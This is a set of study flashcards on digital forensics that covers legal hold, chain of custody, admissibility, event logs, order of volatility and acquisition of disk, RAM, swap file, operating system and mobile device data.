4.5 Digital Forensics Flashcards
The application of science to the identification, collection, examination, and analysis, of data while preserving the integrity of the information and maintaining a strict chain of custody for the data.
• Collect and protect information relating to an intrusion
– Many different data sources and protection
mechanisms
• RFC 3227 - Guidelines for
– Evidence Collection and Archiving
– A good set of best practices
• Standard digital forensic process
– Acquisition, analysis, and reporting
• Must be detail oriented
– Take extensive notes
Digital forensics
an internal process that an organization undergoes to preserve all data that might relate to a legal action involving the organization.
• A legal technique to preserve relevant information
– Prepare for impending litigation
– Initiated by legal counsel
• Hold notification
– Records custodians are instructed to preserve data
• Separate repository for electronically stored
information (ESI)
– Many different data sources and types
– Unique workflow and retention requirements
• Ongoing preservation
– Once notified, there’s an ongoing obligation to
preserve data
Legal hold
• A moving record of the event
– Gathers information external to the computer
and network
• Captures the status of the screen and other
volatile information
– Today’s mobile video devices are remarkable
• Don’t forget security cameras and your phone
• The video content must also be archived
– May have some of the most important record
of information
Capture video
• Not all data can be used in a court of law
– Different rules in different jurisdictions
• Legal authorization
– Search and seizure of information
• Procedures and tools
– The correct tools used the correct way
• Laboratories
– Proper scientific principles used to analyze
the evidence
• Technical and academic qualifications
– Competence and qualifications of experts
Admissibility
capable of being allowed or conceded : permissible evidence legally admissible in court. • Control evidence – Maintain integrity • Everyone who contacts the evidence – Use hashes – Avoid tampering • Label and catalog everything – Digitally tag all items for ongoing documentation – Seal and store
Chain of custody
• The time zone determines how the time is displayed
– Document the local device settings
• Different file systems store timestamps* differently
– FAT: Time is stored in local time
– NTFS: Time is stored in GMT
• Record the time offset from the operating system
– The Windows Registry
– Many different values (daylight saving time,
time change information, etc.)
Recording time offsets
give an audit trail that records user events on a PC and is a potential source of evidence in forensic examinations. • System logs – Documents important operating system and application events • Export and store for future reference – Filter and parse • Log store – Linux: /var/log – Windows: Event Viewer
Event logs
• Who might have seen this? – You won’t know until you ask • Interview and document – These folks might not be around later • Not all witness statements are 100% accurate – Humans are fallible
Interviews
• Document the findings
– For Internal use, legal proceedings, etc.
• Summary information
– Overview of the security event
• Detailed explanation of data acquisition
– Step-by-step method of the process
• The findings
– An analysis of the data
• Conclusion
– Professional results, given the analysis
Reports
Forensics Data Acquisition -
• How long does data stick around?
– Some media is much more volatile than others
– Gather data in order from the most volatile to
less volatile
Order of volatility
Forensics Data Acquisition - • Copy everything on a storage drive – Hard drive, SSD, flash drive • Drive image preparation – Power down to prevent changes – Remove storage drive • Connect to imaging device – With write-protection • Forensic clone – Bit-for-bit copy – Preserve all data (even the “deleted” data)
Disk
Forensics Data Acquisition - short term memory where data is stored as the processor needs it. a form of computer memory that can be read and changed in any order, typically used to store working data and machine code. • A difficult target to capture – Changes constantly – Capturing data changes the data • Memory dump – Grab everything in active RAM – Many third-party tools • Important data – Browsing history – Clipboard information – Encryption keys – Command history
Random access memory (RAM)
Forensics Data Acquisition -
space on a hard drive used as a temporary location to store information when RAM is fully utilized. Using a [this], a computer can use more memory than what is physically installed in the computer.
• Used by different operating systems
– Slightly different usage in each
• A place to store RAM when memory is depleted
– There’s a lot more space on the storage drive
– Transfer pages of RAM to a storage drive
• Can also contain portions of an application
– Page out portions that aren’t in use
• Contains data similar to a RAM dump
– Anything active on the system
Swap/pagefile
Forensics Data Acquisition -
• OS files and data – May have been modified • Core operating system – Executable files and libraries – Can be compared later to known-good files – Usually captured with a drive image • Other OS data – Logged in users – Open ports – Processes currently running – Attached device list
Operating system
Forensics Data Acquisition -
• Mobile devices and tablets – A more challenging forensics task • Capture data – Use an existing backup file – Transfer image over USB • Data – Phone calls – Contact information – Text messages – Email data – Images and movies
Device
